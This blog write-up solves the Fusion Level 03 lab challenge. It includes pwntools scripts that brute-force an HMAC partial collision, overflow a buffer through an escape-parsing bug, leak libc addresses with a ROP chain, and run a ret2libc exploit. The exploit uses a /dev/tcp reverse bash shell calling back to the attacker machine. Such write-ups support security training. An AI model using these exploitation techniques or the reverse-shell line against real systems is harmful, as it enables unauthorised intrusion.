Exploit Education | Fusion | Level 03 Solution

This level introduces partial hash collisions (hashcash) and more stack corruption.

The description and source code can be found here:
http://exploit.education/fusion/level03/

This level is similar to the last level with added complexity in figuring out how to overflow the buffer. Also, I learned a new ret2libc technique here as I couldn’t figure out how to leak a libc address.

Source Code Analysis

This was one of the most difficult challenges I’ve faced in just learning how the program works. When connecting to the machine with netcat, you just get a token:

andrew ~ $ nc fusion 20003
"// 192.168.56.101:33316-1583172362-239218924-1215732487-2090921930"

I had no idea what to do next, so I turned to the source code. I usually go through each function of the program, show the code, and describe what’s happening. For this level, however, I’ll just give a brief overview of what each function does. There are 6 main functions called by main():

send_token()

A token is generated based on the client’s IP/source port, date & time, and 3 additional random values. That token is then sent to the client. The specifics of how the token is generated doesn’t really matter. Later, we’ll see that it’s used in generating an HMAC (hash-based message authentication code).

read_request()

This function just listens for a new “request” from the client and saves it to the gRequest global variable. It also closes the connection the client has to the server, making it difficult to leak libc’s address.

validate_request()

This is where things start getting interesting. First, it checks to make sure the first part of the client’s request equals the token that was provided. Next, it produces an HMAC from the token and the message received from the client. An HMAC is essentially a hash of a message and a key. It’s a bit more complicated than that, but we don’t need to know the details for this. Finally, the function does a bitwise OR operation on the first 2 bytes of the resulting hash. If the result is anything other than 0, then the program exits. What this tells us is that all bits in the first 2 bytes of the hash must be 0.

parse_request()

Whatever JSON is included in the client’s request is parsed and saved to a JSON object.

handle_request()

A “foreach” loop iterates over each of the JSON items; tags, title, contents, and serverip. Global variables called gTitle, gContents, and gServerIP are populated from these JSON items. Let’s focus on the title as that’s where I’ll be overflowing the buffer. Before the global variable, gTitle, is populated, a local variable called title with 128 bytes of buffer space is filled. Another function, decode_string(), is called on the user-supplied input and saves the “decoded” title to the local title variable.

decode_string()

This function essentially walks through the user input, looking for “escaped” characters, and replacing them with the actual bytes they’re associated with. For instance, if a user wanted a newline character in the “Title” field, they would use “\n” to represent it. If this function sees that, it’s replaced with a 0x0a byte for when the “blog post” is actually sent. The kicker here, is that the while loop used for iterating through the user’s input will break if iterator address equals then end of the buffer’s address. NOT if it’s greater than or equal to the end of the buffer’s address. AND when a “\u” is detected, the iterator is incremented twice! Let’s look at the important parts of this code:

while (*src && dest != end) {
    if (*src == '\\') {
        *src++;
        switch (*src) {
            ...
            case 'u':
                ...
                *dest++ = (what >> 8) & 0xff;
                *dest++ = (what & 0xff);
        }...
    }...
}

This means that if “\u” is at the 127th byte, then we could continue filling the buffer as iterator, “dest,” will never equal “end.”

post_blog_article()

Finally, the actual HTTP POST request is created. This includes the title and content supplied by the user and completely ignores the tags. The request is sent to the IP address and port provided in the “serverip” field of the JSON object.

Interacting With The Program

Now that we understand how the program works, we can write a Python script to interact with it. Because I need the first 2 bytes of the hashed request to equal 0, I’ll need the script to randomize part of the request, check the hash, and try again if it’s not correct.

#!/usr/bin/env python3

import random, string, hmac
from json import dumps
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1]
log.info(f"Token: {token}")
print()

while (True):
    title = random_string(20)
    msg = dumps({"tags": ["a"],
                 "title": title,
                 "contents": "Blog post",
                 "serverip": "192.168.56.101:8080"})
    payload = token + "\n" + msg
    hashed = hmac.new(token.encode(), payload.encode(), sha1)

    if hashed.hexdigest()[:4] == "0000":
        log.info("Payload:")
        print(payload)
        log.info(f"Hash: {hashed.hexdigest()}")
        break

print()
io.send(payload)
log.info("Payload sent!")
io.close()

I’ll start a netcat listener in another terminal, using $ nc -nlp 8080, to catch the HTTP request sent by the server. Then I’ll execute the script. It usually doesn’t take more than a few seconds to get a valid hash:

andrew ~/fusion/level03 $ ./level03_test.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: // 192.168.56.101:33472-1583260929-960947877-723786-166326360

[*] Payload:
// 192.168.56.101:33472-1583260929-960947877-723786-166326360
{"tags": ["a"], "title": "lJRt7ir2wwBTVy2zPkcZ", "contents": "Blog post", "serverip": "192.168.56.101:8080"}
[*] Hash: 0000938f4ddb78f027478fbf50e3575758e08b0d

[*] Payload sent!
[*] Closed connection to fusion port 20003

And the netcat listener caught the HTTP request sent by the server:

andrew ~ $ nc -nlp 8080
POST /blog/post HTTP/1.1
Connection: close
Host: 192.168.56.101:8080
Content-Length: 33

lJRt7ir2wwBTVy2zPkcZ
Blog post

Leaking Libc Address

The next thing to do is to figure out how we can leak some libc addresses. This part took me a long time to figure out after a LOT of trial and error. One thing that makes this level difficult is that the program closes stdin, stdout, and stderr in the read_request() function. I did manage to figure out how to overwrite a global variable with a GOT address using memcpy(). Here, I’ll be overwriting the “gTitle” variable with the address of the GOT entry for __libc_start_main. First, I’ll need to get a few addresses:

andrew ~/fusion/level03 $ objdump -d level03 | grep -A1 "__libc_start_main@plt>:"
08048d80 <__libc_start_main@plt>:
 8048d80:       ff 25 2c bd 04 08       jmp    *0x804bd2c

andrew ~/fusion/level03 $ rabin2 -s level03 | egrep 'memcpy|post_blog_article|gTitle$'
100  0x00001f20 0x08049f20 GLOBAL FUNC   745      post_blog_article
132  ---------- 0x0804be04 GLOBAL OBJ    4        gTitle
39   0x00000e60 0x08048e60 GLOBAL FUNC   16       imp.memcpy

If you haven’t noticed, I copied the binary to my attacking machine. It has a few more tools than the Fusion VM, such as ropper and radare2. Anyway, I’ll need to use the address 0x08048d82 as a function argument, which is where the GOT address begins. If you’re wondering why, it’s because I need to use the address of the address of the GOT entry. When I use memcpy(), it won’t copy the 0x08048d82 address, it’ll copy where it points to. Then, when the contents of “gTitle” are sent back to me, it’ll be the address that the GOT entry points to, which is the location of the function in libc.

My ROP chain should look like this:

0x08048e60:  Address of memcpy@plt
0x08049f20:  Address of post_blog_article() (function to return to)
0x0804be04:  Address of gTitle variable (where to write to)
0x08048d82:  Address of __libc_start_main@got address (what to write)
       0x4:  How many bytes to write

One thing to note, I ran the first script I created (the one to simply interact with the server) while having GDB attached to the process so I could debug it. The 4-byte location on the stack where that 0x4 value needs to go is already zeroed out. What luck! If I were to attempt to send any null bytes as a part of my ROP chain, the whole thing simply wouldn’t work. This way, I’m able to just end my ROP chain with 0x4 and nothing else after that is required.

This time, I catch the server’s response in the same script instead of using a netcat listener and having to manually find the leaked address and reverse the bytes (I would use $ nc -nlp 8080 | xxd to see non-printable characters), I wanted all that to be done in an automated way to remove any room for error. And pwntools makes that possible by letting you create a listener:

#!/usr/bin/env python3

import random, string, hmac
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1].encode()
log.info(f"Token: {token}")

while (True):
    # Bad chars: 0x00 & 0x5c (backslash)
    title  = random_string(127).encode()
    title += b"\\\u" + b"A"*35
    title += p32(0x08048e60)  # Address of memcpy@plt
    title += p32(0x08049f20)  # Address of post_blog_article() function (to return to)
    title += p32(0x0804be04)  # Address of gTitle (Where to write to)
    title += p32(0x08048d82)  # Address of __libc_start_main@got address (What to write)
    title += b"\x04"          # How many bytes to write

    payload  = token
    payload += b'\x0a'
    payload += b'{"tags": ["a"], "title": "'
    payload += title
    payload += b'", "contents": "", "serverip": "192.168.56.101:8080"}'

    hashed = hmac.new(token, payload, sha1)
    if hashed.hexdigest()[:4] == "0000":
        log.info(f"Valid hash found: {hashed.hexdigest()}")
        break

l = listen(8080)
log.info("Sending payload...")
io.send(payload)
io.close()
l.wait_for_connection()
print()
log.success(f"Leaked address for __libc_start_main(): {hex(u32(l.recv()[95:99]))}")
andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40380-1583430479-1858822997-1207724749-568489767'
[*] Valid hash found: 0000f46d11328fb9a4ada2006758e4c155769abe
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53805
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for __libc_start_main(): 0xb74cc020

In my previous post for the Level 02 Solution, I mentioned a handy tool that can help you find out which version of libc your target machine is running. It’s called libc-database. It allows us to supply it with a libc function name and the last 3 hex characters from it’s leaked address in order to get the right binary. You can even supply it with 2 functions with their offsets for increased accuracy if you get more than 1 hit.

I’m going to use this tool to make this scenario as realistic as possible. We’re attacking a remote machine and we have a copy of the vulnerable binary, but no idea as to which version of libc is used. That makes it a bit difficult to use a ret2libc attack on a system with ASLR enabled. Sure, we could brute force our way to success on this x86 system, but that’d be quite difficult on an x64 system. Now that I’ve leaked the libc address of one of the libc functions, I can use the libc-database tool to find out which version the target VM is running:

andrew ~/libc-database (master) $ ./find __libc_start_main 020
archive-old-eglibc (id libc6_2.13-20ubuntu5.2_i386)
archive-old-eglibc (id libc6_2.13-20ubuntu5.3_i386)
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)

It looks like there are 3 possibilities. That means I’ll need to leak another address to add to the search. Note: There are a couple of functions that did not work properly with this method, such as srand(). For some reason, I never got a response from the server when trying to leak them. However, it looks like open() will work. First, I’ll need to get the location of the GOT address:

andrew ~/fusion/level03 $ objdump -d level03 | grep -A1 "open@plt>:"
08048c30 <open@plt>:
 8048c30:       ff 25 d8 bc 04 08       jmp    *0x804bcd8

Next, I just need to modify my script a bit. I modified the ROP chain in line 23 to show:

title += p32(0x08048c32)  # Address of open@got address (What to write)

Now I can leak the address of open():

andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40384-1583430893-1722808803-851397042-1284999612'
[*] Valid hash found: 0000738e3f3a55e3535d85f1c9c0de8e8fd04717
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53806
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for open(): 0xb7573b60

I can now search the libc database for both values:

andrew ~/libc-database (master) $ ./find __libc_start_main 020 open b60
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)

Nice! From this, I can calculate the memory address of system() and exit(). First, I’ll need to find some offsets:

andrew ~/libc-database (master) $ rabin2 -s db/libc6_2.13-20ubuntu5_i386.so | egrep ' system$| open$| exit$'
135   0x000329e0 0x000329e0 GLOBAL FUNC   45        exit
1409  0x0003cb20 0x0003cb20 WEAK   FUNC   139       system
1763  0x000c0b60 0x000c0b60 WEAK   FUNC   128       open

I know that open() is at 0xb7573b60, so let’s do some math:

open addr  - open offset = libc addr
0xb7573b60 - 0x000c0b60  = 0xb74b3000

libc addr  + system offset = system addr
0xb74b3000 +  0x0003cb20   = 0xb74efb20

libc addr  + exit offset = exit addr
0xb74b3000 + 0x000329e0  = 0xb74e59e0

Exploitation

I’m also going to need to get the server to open a new connection to the attacking machine since the server closes stdin, stdout, and stderr before this ROP chain is executed. When calling system(), I’ll create a reverse Bash shell with the following string, /bin/bash -i >& /dev/tcp/192.168.56.101/8080 0>&1, placed into the “gContents” variable. I can’t just use the address of “gContents” in my ROP chain since that actually points to another address, the actual string, which is saved in the heap. And of course, heap space is randomized with ASLR. So now, I’ll also need to leak the address that the “gContents” variable points to.

I need to find the address for this variable:

andrew ~/fusion/level03 $ rabin2 -s level03 | grep gContents$
90   ---------- 0x0804bdf4 GLOBAL OBJ    4        gContents

However, I can’t just use that address. I need to find an address to that address:

andrew ~/fusion/level03 $ objdump -d level03 | grep 804bdf4
 8049ef4:       a3 f4 bd 04 08          mov    %eax,0x804bdf4
 8049f35:       8b 15 f4 bd 04 08       mov    0x804bdf4,%edx
 804a059:       8b 15 f4 bd 04 08       mov    0x804bdf4,%edx

I can use the address 0x08049f37. I tried the first result and for some reason the leak didn’t work. Again, I’ll modify line 23 of my level03_leak.py script:

title += p32(0x08049f37)  # Address of gContents address (What to write)

Now, after some trial and error, I realized that adding data to the “contents” field in the JSON object will change the heap address of the “gContents” variable. So I had to calculate the length of my reverse shell string (49 bytes) and added 49 A’s to that field, as such:

payload += b'", "contents": "' + b'A'*49
payload += b'", "serverip": "192.168.56.101:8080"}'

Running that will get me the leaked address:

andrew ~/fusion/level03 $ ./level03_leak.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40400-1583433168-986885746-896451877-843201424'
[*] Valid hash found: 0000772700252331533aa0d58750a2f3ba990740
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53807
[*] Sending payload...
[*] Closed connection to fusion port 20003

[+] Leaked address for gContents: 0x83a8690

Great! Now I can build my final exploit script. Some minor modifications to the level03_leak.py script should do the trick:

#!/usr/bin/env python3

import random, string, hmac
from hashlib import sha1
from pwn import *


def random_string(size=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))


io = remote('fusion', 20003)
token = io.recvline().decode().split('"')[1].encode()
log.info(f"Token: {token}")

while (True):
    # Bad chars: 0x00 & 0x5c (backslash)
    title  = random_string(127).encode()
    title += b"\\\u" + b"A"*35
    title += p32(0xb74efb20)  # Address of system@libc
    title += p32(0xb74e59e0)  # Address of exit@libc
    title += p32(0x083a8690)  # Address of reverse shell string @ gContents

    contents = b'/bin/bash -i >& /dev/tcp/192.168.56.101/8080 0>&1'

    payload  = token
    payload += b'\x0a'
    payload += b'{"tags": ["a"], "title": "'
    payload += title
    payload += b'", "contents": "' + contents
    payload += b'", "serverip": "192.168.56.101:8080"}'

    hashed = hmac.new(token, payload, sha1)
    if hashed.hexdigest()[:4] == "0000":
        log.info(f"Valid hash found: {hashed.hexdigest()}")
        break

r = listen(8080)
io.send(payload)
io.close()
r.wait_for_connection()
print()
r.interactive()

Let’s run it:

andrew ~/fusion/level03 $ ./level03_system.py 
[+] Opening connection to fusion on port 20003: Done
[*] Token: b'// 192.168.56.101:40368-1583429614-431280295-283298453-2132779236'
[*] Valid hash found: 000012ec96d4ac85bd57ecfaa1dbfbd7bcbefbaa
[+] Trying to bind to 0.0.0.0 on port 8080: Done
[+] Waiting for connections on 0.0.0.0:8080: Got connection from 192.168.56.102 on port 53802
[*] Closed connection to fusion port 20003

[*] Switching to interactive mode
bash: no job control in this shell
groups: cannot find name for group ID 20003
I have no name!@fusion:/$ $ id
id
uid=20003 gid=20003 groups=20003

5 thoughts on “Exploit Education | Fusion | Level 03 Solution

  1. x90slide says:

    Thanks for this! Thanks to your writeups, these challenges are a lot more approachable and I’ve learned a lot!

    Reply
  2. Dave says:

    I wonder why it begins at address 0x08048d82
    because GDB shows it’s 08048d80
    which points to *0x804bd2c
    why add +2?

    Reply
    1. Dave says:

      When the dynamic linker needs to resolve a symbol, it first checks the GOT for the address of the symbol. If the address is not yet resolved, the linker uses the value at the symbol’s PLT entry as the address of the function to call, which will trigger the resolution process.

      In many systems, the first entry in the PLT is a small trampoline stub that jumps to the dynamic linker’s resolution function, which then returns the address of the actual symbol implementation. This trampoline stub is often located at the address of the symbol’s PLT entry + 0x2.

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.